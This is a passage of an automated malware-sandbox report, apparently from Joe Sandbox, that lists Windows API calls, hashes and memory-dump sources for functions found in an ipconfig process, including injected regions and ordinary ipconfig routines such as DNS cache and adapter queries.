                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E3838B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: 7a7db78e318659ce995d00dee244df93e8f2fb8316e03c2a224c66c113239db3
                                                                                                                              • Instruction ID: 05ac87cdc5f694d1306e2e80d05e1b5e477b84c06beda479b3bcf6e0bde435e2
                                                                                                                              • Opcode Fuzzy Hash: 7a7db78e318659ce995d00dee244df93e8f2fb8316e03c2a224c66c113239db3
                                                                                                                              • Instruction Fuzzy Hash: 6C014C31B412187BE720A6909C07FFE7B6C5B40F40F080118FF04BA1C2D694690583E2
                                                                                                                              Function 00E38310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00E3836A
                                                                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00E3838B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePostThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1836367815-0
                                                                                                                              • Opcode ID: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                                                                                                              • Instruction ID: 1c7111e595055ca77c6142f87e0eaec02f664ac4674fbef39a6012f00dc78621
                                                                                                                              • Opcode Fuzzy Hash: f2c01e1818d052739ee633fa7746fb4f3ba52e36b8bad28e88873d1147d52be0
                                                                                                                              • Instruction Fuzzy Hash: C001A771A8132877E720A6949C07FFE7B6C6B40F51F040114FF04BA1C2E694690586F6
                                                                                                                              Function 00E3ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00E3AD52
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                              • Instruction ID: 7839967597c20408e716f0cbb5c36117f161ad0e9abff887f29c9df16ce4c543
                                                                                                                              • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                              • Instruction Fuzzy Hash: 7D015EB5E0020DABDB10EAA0EC46F9DB7B89B54308F1445A4E908A7241F670EB44CB91
                                                                                                                              Function 00E4A6A0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00E4A6F4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186235152-0
                                                                                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                              • Instruction ID: a46df909c4501ac8443decf99251d9c350ec3fa6330f22d48b78acbbda570210
                                                                                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                              • Instruction Fuzzy Hash: D501AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                                                                                                              Function 00E49170 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E3F040,?,?,00000000), ref: 00E491AC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                                                                                                              • Instruction ID: ee718a2e35cecd243dc4022eb6e1289ef90d31f640e88bb4343db86ff4a3c34c
                                                                                                                              • Opcode Fuzzy Hash: ee06839627b3fc3384d27bf63a2734d2a2dac8c628ec9485e691761f4e1bbd4e
                                                                                                                              • Instruction Fuzzy Hash: 44E065733912043AE22065A9AC02FA7B39CDB91B20F15002AFA0DFB2C2D995F80142A8
                                                                                                                              Function 00E49163 Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00E3F040,?,?,00000000), ref: 00E491AC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2422867632-0
                                                                                                                              • Opcode ID: d48f8fe6ef5d46e234014e8d878507df21985b8c0a45f54d8ca8f1d8a272da7e
                                                                                                                              • Instruction ID: 6dda7f446f0875303133c6f002c8f0337eb7267970ffba74da11e866ac63846b
                                                                                                                              • Opcode Fuzzy Hash: d48f8fe6ef5d46e234014e8d878507df21985b8c0a45f54d8ca8f1d8a272da7e
                                                                                                                              • Instruction Fuzzy Hash: ACF0ED363903547AD331A668AC02FAB76A9CF95B14F190069FA48BB2C3D695F84582E4
                                                                                                                              Function 00E4A782 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E3F1C2,00E3F1C2,?,00000000,?,?), ref: 00E4A7C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3899507212-0
                                                                                                                              • Opcode ID: 83b7f2dfc0b72734c716f888af6f38424a3a50befec95072967ea520273e46e1
                                                                                                                              • Instruction ID: 055bd950b1ba6e22ca9ee5335a0a71bcf4d166a9bea0f9212874e7fa9299392f
                                                                                                                              • Opcode Fuzzy Hash: 83b7f2dfc0b72734c716f888af6f38424a3a50befec95072967ea520273e46e1
                                                                                                                              • Instruction Fuzzy Hash: D0E06DB6640205ABD620DF68DC80EE737AE9F58250F128165FA0DEB241DA35E8058BB0
                                                                                                                              Function 00E3F6B7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,00E38D14,?), ref: 00E3F6EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: 18f2f8fba4085cef717c43deeebec4767618dfe020849fa0a013e8d3c3b21a0a
                                                                                                                              • Instruction ID: 9c6bad6d81e9f0c6454f1be731817eecc14cb02ba633d496b37b70bde0f2c229
                                                                                                                              • Opcode Fuzzy Hash: 18f2f8fba4085cef717c43deeebec4767618dfe020849fa0a013e8d3c3b21a0a
                                                                                                                              • Instruction Fuzzy Hash: BAE0C2A278030437EA00EAA59C13F6777CC9B54B04F094070F949EB2C3D924E4028270
                                                                                                                              Function 00E4A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,00E3F1C2,00E3F1C2,?,00000000,?,?), ref: 00E4A7C0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LookupPrivilegeValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3899507212-0
                                                                                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                              • Instruction ID: 9f84ed081b15e4845fc3f2ce8b6fc5c0edcb97f822d6d6d4a6403d3c1dab391c
                                                                                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                              • Instruction Fuzzy Hash: 51E01AB22002086BDB10DF49DC85EE737ADAF88650F018164BE0867241C931E8148BF5
                                                                                                                              Function 00E3F6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,00E38D14,?), ref: 00E3F6EB
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000032308.0000000000E30000.00000040.80000000.00040000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_e30000_ipconfig.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2340568224-0
                                                                                                                              • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                              • Instruction ID: 3a812812dde4a62659f571b946048f5e570dfeda29d839b9a3c47b19099ee44c
                                                                                                                              • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                              • Instruction Fuzzy Hash: 75D0A7727503083BE610FAA59C07F2633CC6B54B04F490074F948EB3C3D954E4008165
                                                                                                                              Function 038A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4001015538.0000000003830000.00000040.00001000.00020000.00000000.sdmp, Offset: 03830000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4001015538.0000000003959000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.000000000395D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000009.00000002.4001015538.00000000039CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6340105c103be8baaa2054d17a8ece958c0f6baa98a7c8144670b5035803aa5c
                                                                                                                              • Instruction ID: edeba21e596165762695597481f3bb5759af830cf08dcc77f539cdde9dbcad41
                                                                                                                              • Opcode Fuzzy Hash: 6340105c103be8baaa2054d17a8ece958c0f6baa98a7c8144670b5035803aa5c
                                                                                                                              • Instruction Fuzzy Hash: BDB09B719019C5C9EA11E7A44A08717791467D0701F29C4E1D3034651E4739C1D5E576

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00F639FE Relevance: 23.4, APIs: 11, Strings: 2, Instructions: 616memorywindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(000008FF,00000000,00000000,?,00000014,00000000), ref: 00F63BEE
                                                                                                                              • ConvertLengthToIpv4Mask.IPHLPAPI(?,00000000), ref: 00F63C4F
                                                                                                                              • InetNtopW.WS2_32(00000002,?,?,00000041), ref: 00F63C79
                                                                                                                                • Part of subcall function 00F63096: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00F630B1
                                                                                                                                • Part of subcall function 00F63096: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?,?,?), ref: 00F630BF
                                                                                                                                • Part of subcall function 00F63096: GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000400,00000002,?,00000000,?,00000080,?,?), ref: 00F630D9
                                                                                                                                • Part of subcall function 00F63096: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000080,?,?), ref: 00F630E5
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00F63F4C
                                                                                                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F63F53
                                                                                                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00F63FCE
                                                                                                                              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00F63FD5
                                                                                                                                • Part of subcall function 00F63901: RtlIpv4AddressToStringExW.NTDLL ref: 00F63918
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?), ref: 00F64141
                                                                                                                              • LocalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(00000040,?,?,?,?), ref: 00F64151
                                                                                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,000000C6,00000000,00000000,?), ref: 00F64167
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?), ref: 00F64190
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Local$FreeHeapTime$FileFormat$AllocIpv4MessageProcess$AdaptersAddressAddressesConvertDateErrorInetLastLengthMaskNtopStringSystem__iob_func
                                                                                                                              • String ID: %02X-$A
                                                                                                                              • API String ID: 2780012581-292374352
                                                                                                                              • Opcode ID: 0e73dc7aecc17fd0b4166545c72f98fc07de88d16a691b8a825150540e8892a1
                                                                                                                              • Instruction ID: 93df012419d4c858f0b62a78e408efa0903091b60e1e1d4c2e47e8c5ba8271f8
                                                                                                                              • Opcode Fuzzy Hash: 0e73dc7aecc17fd0b4166545c72f98fc07de88d16a691b8a825150540e8892a1
                                                                                                                              • Instruction Fuzzy Hash: 2822BB72E04219AFDB24AB60CC86FEA737DBF54714F040159F909AB181DB75EE84AB90
                                                                                                                              Function 00F651A0 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00F652D6,00F61000), ref: 00F651A7
                                                                                                                              • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00F652D6,?,00F652D6,00F61000), ref: 00F651B0
                                                                                                                              • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00F652D6,00F61000), ref: 00F651BB
                                                                                                                              • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00F652D6,00F61000), ref: 00F651C2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3231755760-0
                                                                                                                              • Opcode ID: 70ff086beb516c3ef91374f1bbbc3e779d65c886ae04fa24a1ba33c0580420b6
                                                                                                                              • Instruction ID: fa72080022de79fbf6e0744cf8e749df0686c6b49620499694a64260b8974f9a
                                                                                                                              • Opcode Fuzzy Hash: 70ff086beb516c3ef91374f1bbbc3e779d65c886ae04fa24a1ba33c0580420b6
                                                                                                                              • Instruction Fuzzy Hash: C6D0C93200830CBBDB003BE1EC0CA493F28EB4821AF048000F32A82060CBB14401AB71
                                                                                                                              Function 00F63872 Relevance: 4.6, APIs: 3, Instructions: 58networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DnsGetCacheDataTableEx.DNSAPI(00000001,00000000,?), ref: 00F63885
                                                                                                                              • DnsFree.DNSAPI(?,00000000), ref: 00F638E8
                                                                                                                              • DnsFree.DNSAPI(?,00000000), ref: 00F638F0
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64E6F: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,?,00000000,?,00000001,00000001,?,00F61EB0,00000000,00002908), ref: 00F64E96
                                                                                                                                • Part of subcall function 00F64E6F: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,00F61EB0,00000000,00002908), ref: 00F64EAE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Free$CacheDataFormatLocalMessageTable__iob_func
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2186664420-0
                                                                                                                              • Opcode ID: 54d2fbd9801ba53d25c940dd21e46402843dad0d1d54bfadfeb7af994ce3a451
                                                                                                                              • Instruction ID: b6f368024b99c9227668beb2bac9b2790dcc59b2f8551e67c8ade63ca14ac0e0
                                                                                                                              • Opcode Fuzzy Hash: 54d2fbd9801ba53d25c940dd21e46402843dad0d1d54bfadfeb7af994ce3a451
                                                                                                                              • Instruction Fuzzy Hash: F401C872A08314ABD720AB61CD86EB773A9EF90FA0714442DF49657141DB75BE00B360
                                                                                                                              Function 00F64ACA Relevance: 4.6, APIs: 3, Instructions: 50memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • AllocateAndInitializeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00F64AFB
                                                                                                                              • CheckTokenMembership.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,?,?), ref: 00F64B10
                                                                                                                              • FreeSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?), ref: 00F64B23
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3429775523-0
                                                                                                                              • Opcode ID: 019aa126fb7598f86b6ef90632f4b90492cdcbdbdcbf4edc561b9a6da334a6f3
                                                                                                                              • Instruction ID: 260661ce66a1ca178dc2d0910e6b46f9618adc4d5ecc6482b0591c3756a13635
                                                                                                                              • Opcode Fuzzy Hash: 019aa126fb7598f86b6ef90632f4b90492cdcbdbdcbf4edc561b9a6da334a6f3
                                                                                                                              • Instruction Fuzzy Hash: 5A011671E1420EABDF00EFA1CD85AFEB7B8FB05304F50056AE521E2140D7B4EA04EB60
                                                                                                                              Function 00F626AE Relevance: 1.5, APIs: 1, Instructions: 17timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00F626B7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Time$FileSystem
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2086374402-0
                                                                                                                              • Opcode ID: 9e7548a35c72ce62c75a8651a5764dd3d0488007771cf0cfa3a8f523bc15449a
                                                                                                                              • Instruction ID: 7b2fb75caeb9d278830e90df1523a12079c5645232a61b6113d66de8e99003f5
                                                                                                                              • Opcode Fuzzy Hash: 9e7548a35c72ce62c75a8651a5764dd3d0488007771cf0cfa3a8f523bc15449a
                                                                                                                              • Instruction Fuzzy Hash: 67D0A73300822ABBCB503F95DC04C86BBA9EF96331710C327F5B451062DEB19C5097A0
                                                                                                                              Function 00F653F0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000053A0), ref: 00F653F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3192549508-0
                                                                                                                              • Opcode ID: 99c8bf8047e30fe07484a33c9b82c5a5100b8f8cec3a1f8643e6263f95370733
                                                                                                                              • Instruction ID: b1d70ae809c8a2d466a8cc1f23535ad14f3cc959d74a44579185d7d3270c65cf
                                                                                                                              • Opcode Fuzzy Hash: 99c8bf8047e30fe07484a33c9b82c5a5100b8f8cec3a1f8643e6263f95370733
                                                                                                                              • Instruction Fuzzy Hash: F2900270255604E686002BB06D4A40676955B4CE46BD14550E021D4154DBE190007532
                                                                                                                              Function 00F646F8 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 232memorythreadwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00F6470F
                                                                                                                              • setlocale.MSVCRT ref: 00F6471B
                                                                                                                              • SetThreadUILanguage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000), ref: 00F64724
                                                                                                                                • Part of subcall function 00F65769: __iob_func.MSVCRT ref: 00F6576E
                                                                                                                                • Part of subcall function 00F64C73: fgetpos.MSVCRT ref: 00F64CA8
                                                                                                                                • Part of subcall function 00F64C73: _fileno.MSVCRT ref: 00F64CC2
                                                                                                                                • Part of subcall function 00F64C73: _setmode.MSVCRT ref: 00F64CCA
                                                                                                                                • Part of subcall function 00F64C73: fwprintf.MSVCRT ref: 00F64CD6
                                                                                                                              • exit.MSVCRT ref: 00F647E5
                                                                                                                              • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001100,00000000,000002E4,00000000,?,00000000,00000000), ref: 00F64807
                                                                                                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F64827
                                                                                                                                • Part of subcall function 00F631D0: DnsResolverOp.DNSAPI(00000002,00000000,00000000), ref: 00F631D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                                                                                              • Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FormatFreeHeapInformationLanguageLocalMessageResolverThread__iob_func_fileno_setmodeexitfgetposfwprintfsetlocale
                                                                                                                              • String ID: all$allcompartments$debug$displaydns$flushdns$registerdns$release$release6$renew$renew6$setclassid$setclassid6$showclassid$showclassid6
                                                                                                                              • API String ID: 1456437472-1517225019
                                                                                                                              • Opcode ID: 58129bc72d749a5675c8c7ba11868c5b215fcc9dc95c72453760bef81a532212
                                                                                                                              • Instruction ID: 38ebd4b488f0572513148333357f824b765419f4dff79e876b43c2ab830ae85d
                                                                                                                              • Opcode Fuzzy Hash: 58129bc72d749a5675c8c7ba11868c5b215fcc9dc95c72453760bef81a532212
                                                                                                                              • Instruction Fuzzy Hash: A181AA76948341AB8721FF20D88692FB7E4BFC1764F284A1EF49257242DB74AC44FB52
                                                                                                                              Function 00F64D35 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 124memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • fflush.MSVCRT ref: 00F64D51
                                                                                                                                • Part of subcall function 00F64B41: _fileno.MSVCRT ref: 00F64B4C
                                                                                                                                • Part of subcall function 00F64B41: _get_osfhandle.MSVCRT ref: 00F64B53
                                                                                                                              • _fileno.MSVCRT ref: 00F64D71
                                                                                                                              • _setmode.MSVCRT ref: 00F64D79
                                                                                                                              • wcschr.MSVCRT ref: 00F64D9C
                                                                                                                              • _fileno.MSVCRT ref: 00F64DC2
                                                                                                                              • _setmode.MSVCRT ref: 00F64DCA
